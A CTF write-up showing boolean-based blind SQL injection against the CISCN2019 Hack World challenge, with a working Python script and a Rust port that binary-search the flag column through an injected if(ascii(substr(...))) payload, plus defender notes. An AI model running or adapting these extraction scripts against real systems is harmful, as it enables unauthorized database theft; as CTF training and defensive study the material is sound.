
CTF-Sql注入相关

布尔盲注 {#布尔盲注}

经典案例:CISCN2019 Hack World

"""Boolean-based blind SQL injection walkthrough for CISCN2019 Hack World.

The `id` field is evaluated server-side and the response either contains the
string "Hello" or it does not, so every request leaks exactly one bit: whether
the ASCII code of one character of the flag is above the current pivot.  A
binary search over ASCII 32..127 therefore costs about seven requests per
character.  From a defender's view the signature is a burst of POSTs to
index.php whose `id` form field contains `if(ascii(substr(`; a parameterized
query removes the oracle entirely.
"""
from time import sleep

import requests

# target address
url = "http://0396fe4b-c4d2-49da-addd-97b5169e2bad.node5.buuoj.cn:81/index.php"

# recovered flag, grown by one character per outer iteration
flag = ""

# character position inside the flag; substr() is 1-based, so the first
# probe uses position 1
i = 0
while True:
    i += 1
    # binary search bounds over printable ASCII for this character
    lo, hi = 32, 127
    while lo < hi:
        mid = (lo + hi) // 2
        # the injected expression yields 1 when the character's code exceeds
        # mid and 2 otherwise; the page answers the 1 branch with "Hello"
        query = f"if(ascii(substr((select(flag)from(flag)),{i},1))>{mid},1,2)"
        response = requests.post(url, data={"id": query})
        sleep(0.3)
        # "Hello" means the code is above mid: discard the lower half, else the upper
        lo, hi = (mid + 1, hi) if "Hello" in response.text else (lo, mid)
    # ASCII 32 (space) is taken to mean substr() ran past the end of the flag
    if lo == 32:
        break
    flag = flag + chr(lo)
    print(flag)
print("end")

/// Boolean-based blind extraction of the `flag` column, an async `reqwest` port of the
/// Python walkthrough above (CISCN2019 Hack World).
///
/// Every request posts `id=if(ascii(substr(...,<position>,1))><pivot>,1,2)`; the page
/// answers the `1` branch with a body containing `"Hello"`, which is the single bit the
/// binary search over ASCII 32..127 consumes. Each recovered character is appended to
/// `flag` and the running value is printed; an ASCII 32 result is taken to mean
/// `substr()` ran past the end of the flag and ends the extraction.
///
/// # Errors
///
/// Never returns `Err` as written: a failed `send()` is printed and the same probe is
/// retried, while a failure reading the body panics (`unwrap`). `position` is a `u8`,
/// so the loop cannot advance past character 255.
///
/// Defender notes: the traffic signature is a burst of POSTs to `index.php` whose form
/// body starts with `id=if(ascii(substr(`; a parameterized query removes the oracle.
pub async fn bool_blind_inject() -> Result<(), String> {
    let endpoint = "http://6464d630-7fd5-42fb-8774-19370b670f4d.node5.buuoj.cn:81/index.php";
    let mut flag = String::new();
    let mut position = 0u8;
    loop {
        position += 1;
        // Binary search bounds over printable ASCII for this character.
        let (mut lo, mut hi) = (32u8, 127u8);
        while lo < hi {
            let pivot = (lo + hi) / 2;
            let form_body = format!(
                "id=if(ascii(substr((select(flag)from(flag)),{},1))>{},1,2)",
                position, pivot
            );
            let request = reqwest::Client::new()
                .post(endpoint)
                .header("Content-Type", "application/x-www-form-urlencoded")
                .body(form_body);

            // A transport error is reported and the same pivot is probed again.
            let response = match request.send().await {
                Ok(response) => response,
                Err(e) => {
                    println!("{:#?},try again", e);
                    continue;
                }
            };
            let body = response.text().await.unwrap();
            // "Hello" means the true code is above the pivot.
            if body.contains("Hello") {
                lo = pivot + 1;
            } else {
                hi = pivot;
            }
        }
        // ASCII 32 (space) signals the end of the flag.
        if lo == 32 {
            break;
        }
        flag.push(char::from(lo));
        println!("{}", flag);
    }
    Ok(())
}